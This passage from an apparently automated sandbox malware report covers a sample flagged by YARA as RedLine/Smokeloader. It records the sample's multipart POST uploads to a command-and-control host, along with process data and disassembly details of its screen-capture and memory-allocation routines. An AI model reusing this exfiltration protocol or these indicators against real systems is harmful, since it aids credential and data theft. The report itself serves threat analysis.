                                            2024-03-29 07:10:54 UTC8782OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:54 UTC | 806 | IN | HTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=4h7c199lbn7p2qv7ttp30ceg9r; expires=Tue, 23-Jul-2024 00:57:33 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CqYdC0mgoVlCD9gDdYZpxbZGTDwWEAqNtUx3PSWKrlXuN2y%2BzGgJtpj7TCYIjv9v6m%2F1W62A%2FgBtVTNGCadzCDKhf%2FJ7CVIUn33mr4TnqEnXfpgXMbKsiQMK7rN5U2PSFXR3Q0lmL1jw"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0af6ebd52000-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:54 UTC | 22 | IN | Data Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                            Data Ascii: 10ok 102.165.48.43
                                            2024-03-29 07:10:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            4 | 192.168.2.4 | 49734 | 172.67.221.128 | 443 | 7556 | C:\Users\user\Desktop\20qMFnd9tO.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-03-29 07:10:55 UTC | 288 | OUT | POST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 20435
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:55 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:55 UTC5104OUTData Raw: 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00
                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                            2024-03-29 07:10:55 UTC | 804 | IN | HTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=sovojt9nup7okh3e2gdj039g8l; expires=Tue, 23-Jul-2024 00:57:34 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aUNckGi5WwS7nxQCrQyUVFKKxbtTeD1UTpZ8jCeEE44ePJoVqwahRavPYxGelIEX%2FKs2gArhl8CnOOC4DIJo8OA7%2FfwYtGJ9rIWWZ19PhbeikJ%2BZkcHwLLPqHKK83YKu5w5avHmy2gJ2"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0afc59432896-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:55 UTC | 22 | IN | Data Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                            Data Ascii: 10ok 102.165.48.43
                                            2024-03-29 07:10:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            5 | 192.168.2.4 | 49735 | 172.67.221.128 | 443 | 7556 | C:\Users\user\Desktop\20qMFnd9tO.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-03-29 07:10:56 UTC | 287 | OUT | POST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 7082
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:56 UTC7082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:57 UTC | 804 | IN | HTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=2af1hgsfrpvia55p5mc974ou69; expires=Tue, 23-Jul-2024 00:57:36 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1GOnm4qC0c%2BizXto04qfKwCKvK3N3QLShpXYAWPFi5L7E%2FHJJSQ9zyyegMM7K3F3ibXAe7ZNnPjAwaAzzWI4Uu3QqNyCfMg5aL2xV1soyJnT2n08QOVn%2FnTWA245LRInPJdsTXKS6o5w"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0b04ff18205d-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:57 UTC | 22 | IN | Data Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                            Data Ascii: 10ok 102.165.48.43
                                            2024-03-29 07:10:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            6 | 192.168.2.4 | 49736 | 172.67.221.128 | 443 | 7556 | C:\Users\user\Desktop\20qMFnd9tO.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-03-29 07:10:57 UTC | 287 | OUT | POST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 1410
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:57 UTC1410OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:57 UTC | 810 | IN | HTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=q3r4u02megb1jksrhilspgstb0; expires=Tue, 23-Jul-2024 00:57:36 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zy%2BqM8YX7wl6XnhC0JPtA0TldPf3NjQuTvvaMxa0VTNT3zjDK%2BiGJcokOPcUCT84VKXVcUnPEjAS%2FZJCnbCSP9J%2Bsg3Ma6Aqeyg2nIxlBktFT5%2FSCTXxno%2FTNCd3aZxpCeUDP0nFMm2U"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0b09bdc3201c-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:57 UTC | 22 | IN | Data Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                            Data Ascii: 10ok 102.165.48.43
                                            2024-03-29 07:10:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            7 | 192.168.2.4 | 49737 | 172.67.221.128 | 443 | 7556 | C:\Users\user\Desktop\20qMFnd9tO.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-03-29 07:10:58 UTC | 289 | OUT | POST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 593802
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:58 UTC15331OUTData Raw: 20 f1 0a 11 08 ae f1 b3 73 14 d7 02 4c 7a d2 d9 39 c7 81 ce 7a e2 ff ea ea 7f 2f b5 c0 bd b8 05 cc 62 40 94 31 35 db 07 e1 b4 82 60 07 d3 a0 da 08 8d f5 88 65 e5 1c f5 dc 81 e2 ee a6 3c d8 19 0e 57 84 1b 5d 68 a5 41 cc c3 52 3d 04 70 25 3e c5 ce 05 03 cc e5 97 8f 19 07 44 ec 48 b3 2b 16 92 53 81 a9 3b b6 0b 35 68 de 9b 5f 12 83 56 be 19 b1 84 3a a4 dc ed b9 50 f8 f0 a7 d8 37 8b 13 2a bc 49 8d 18 6a 85 99 ac fa 20 2c d3 5d 88 e4 54 bc a9 c2 22 4c fe 79 cc 1c 25 69 ab ce c7 49 9e 53 63 2f cc 25 ad c8 57 74 ff 93 7a 86 7e 48 88 4c a2 b5 a2 a8 fc 1b 52 2b 9d 7e b0 de 8e dc ff 82 0c b0 b0 d7 2f 68 6d ab 53 58 b1 45 f9 53 9f 50 16 d2 40 46 58 e3 0d 37 b6 3d 14 0b 86 ec 4f d4 94 a9 5c 6b 34 4e a3 52 dc d0 6f 76 a8 43 f5 7d 6f 87 9b d2 77 cb e5 ad c3 1a 93 48 6a
                                            2024-03-29 07:11:00 UTC806INHTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:11:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=p6qfuqk65ec44qevpbkfvf296d; expires=Tue, 23-Jul-2024 00:57:39 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WQ86hKFdK1S3Avb92MJmN%2B113QL94FZQdgUhkXBVQ6fAM9mKog56eqq%2BUHUDG258FoRSN6J9unGMkh%2FHQNyasiIyic6mbsSuzlZQ6Tl1TAhkcfCJHQkW8Y%2BgNRmkbo1k4YJNRjeK7TuF"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0b11dd09581e-IAD
                                            alt-svc: h3=":443"; ma=86400



                                            Target ID:0
                                            Start time:08:10:50
                                            Start date:29/03/2024
                                            Path:C:\Users\user\Desktop\20qMFnd9tO.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\20qMFnd9tO.exe"
                                            Imagebase:0x400000
                                            File size:327'680 bytes
                                            MD5 hash:0F4A71F80CD80F172817F116318E3FCA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1814752389.00000000007DF000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:08:11:00
                                            Start date:29/03/2024
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 1556
                                            Imagebase:0xe60000
                                            File size:483'680 bytes
                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true


                                              Execution Graph

                                              Execution Coverage:8.7%
                                              Dynamic/Decrypted Code Coverage:8.6%
                                              Signature Coverage:45.7%
                                              Total number of Nodes:348
                                              Total number of Limit Nodes:11

                                              Control-flow Graph

                                              APIs
                                              • GetDC.USER32(00000000), ref: 0042B19E
                                              • KiUserCallbackDispatcher.NTDLL(0000004C), ref: 0042B1AE
                                              • GetSystemMetrics.USER32(0000004D), ref: 0042B1B6
                                              • GetCurrentObject.GDI32(00000000,00000007), ref: 0042B1BF
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0042B1CF
                                              • DeleteObject.GDI32(00000000), ref: 0042B1E6
                                              • CreateCompatibleDC.GDI32(00000000), ref: 0042B1ED
                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0042B1FB
                                              • SelectObject.GDI32(00000000,00000000), ref: 0042B207
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 0042B22A
                                              • SelectObject.GDI32(00000000,00000000), ref: 0042B232
                                              • DeleteDC.GDI32(00000000), ref: 0042B239
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0042B242
                                              • DeleteObject.GDI32(00000000), ref: 0042B249
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: Object$Delete$CompatibleCreateSelect$BitmapCallbackCurrentDispatcherMetricsReleaseSystemUser
                                              • String ID: Qp$Qp
                                              • API String ID: 2925702150-1053766494
                                              • Opcode ID: 8fa0317cbb1f235bf63e6316c6b3c27b168894cc8a4fa074e40fe7e36b03dc68
                                              • Instruction ID: f54efbe70d01e80acca420d4f96a3a0cba323340c53da5fefc1411cf757e91d7
                                              • Opcode Fuzzy Hash: 8fa0317cbb1f235bf63e6316c6b3c27b168894cc8a4fa074e40fe7e36b03dc68
                                              • Instruction Fuzzy Hash: 98215732504304AFE3009FA09C49F6F7BE8FFC9782F005429FB85922A0D77499018BEA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$CpMN$E{$H$KDLG$NM$p){/$pC$s@KD
                                              • API String ID: 0-4175016407
                                              • Opcode ID: cf5f581693ce0c35836e21c04a86ec43d2ae26d41c5d11b0bee5ed4b2add4334
                                              • Instruction ID: 593d47b696e48009b196531727b483cbc570187d62b569d21515eb0d4df575d0
                                              • Opcode Fuzzy Hash: cf5f581693ce0c35836e21c04a86ec43d2ae26d41c5d11b0bee5ed4b2add4334
                                              • Instruction Fuzzy Hash: AE1223B02083819BE318CF15C4A476FBBE2BBC5348F545D2DE4D69B292C779D809CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: or]`$ql$uuMx$v|vs$~t~{
                                              • API String ID: 0-1582885218
                                              • Opcode ID: c181e7baaf082f6428e812a5d5f9e31a2e4b373f2c4feb82862eab39c2d3272c
                                              • Instruction ID: c3fe3dd357e1b51b6db3ae82e86e280a51a78cc92652de4e3c93f7c0870a25bc
                                              • Opcode Fuzzy Hash: c181e7baaf082f6428e812a5d5f9e31a2e4b373f2c4feb82862eab39c2d3272c
                                              • Instruction Fuzzy Hash: 4B71D3B15083818FD724CF28C48175BBBE2AF95308F194A6EE5E58B392D738D845CB5B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              • Basic blocks 4322c0-4325f6 (rendered graph not captured in text); calls: 4321c0, NtAllocateVirtualMemory, NtFreeVirtualMemory, RtlAllocateHeap
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0043237C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 004323CF
                                              • RtlAllocateHeap.NTDLL(?,00000000,00000000), ref: 00432474
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,0000BA00,00003000,00000040), ref: 00432520
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000010,00008000), ref: 00432573
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$Allocate$Free$Heap
                                              • String ID:
                                              • API String ID: 996896184-0
                                              • Opcode ID: b2894881f8f3a2d054d551cd58e2212bfdc3c027fc13e287b51561f8e5d4265e
                                              • Instruction ID: 5c95c92c20dc59c6664c2e2f7ecdf8d1e8d1edc756b4fbec66f64321349345c8
                                              • Opcode Fuzzy Hash: b2894881f8f3a2d054d551cd58e2212bfdc3c027fc13e287b51561f8e5d4265e
                                              • Instruction Fuzzy Hash: F691AD75108300AFE700CF18C954B5BBBE5FB89728F148A1DF9A89B391D774D909CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph
                                              • Basic blocks 4226a4-4230ff (rendered graph not captured in text); calls: 436470, 408a40, 408ac0, 4284d0, GetComputerNameExA (twice)
                                              APIs
                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00422B1D
                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00422C3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: ComputerName
                                              • String ID: ido1$kvri
                                              • API String ID: 3545744682-1372408504
                                              • Opcode ID: f65a3c888cac63b7f75acb57a02f369a9874bfff2bca6b5a80168ecacc476a3f
                                              • Instruction ID: b9d25a0b2fa920701055d01af86ece80d2b98a3712395f2c0edf970d086a02d1
                                              • Opcode Fuzzy Hash: f65a3c888cac63b7f75acb57a02f369a9874bfff2bca6b5a80168ecacc476a3f
                                              • Instruction Fuzzy Hash: AB327D70104B929AE725CF34C594BE3BBE1AF16309F4449ADD0FB8B282D7B9604ACB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00422B1D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: ComputerName
                                              • String ID: ido1$kvri
                                              • API String ID: 3545744682-1372408504
                                              • Opcode ID: 97d47b0abb8866480f44754dc735a4b115dcf3b84d48fbb1c07c0b21aa749e4a
                                              • Instruction ID: aee5f226c6f28335b0b116f7373c29df55dc501608c7967c220329754ed2b793
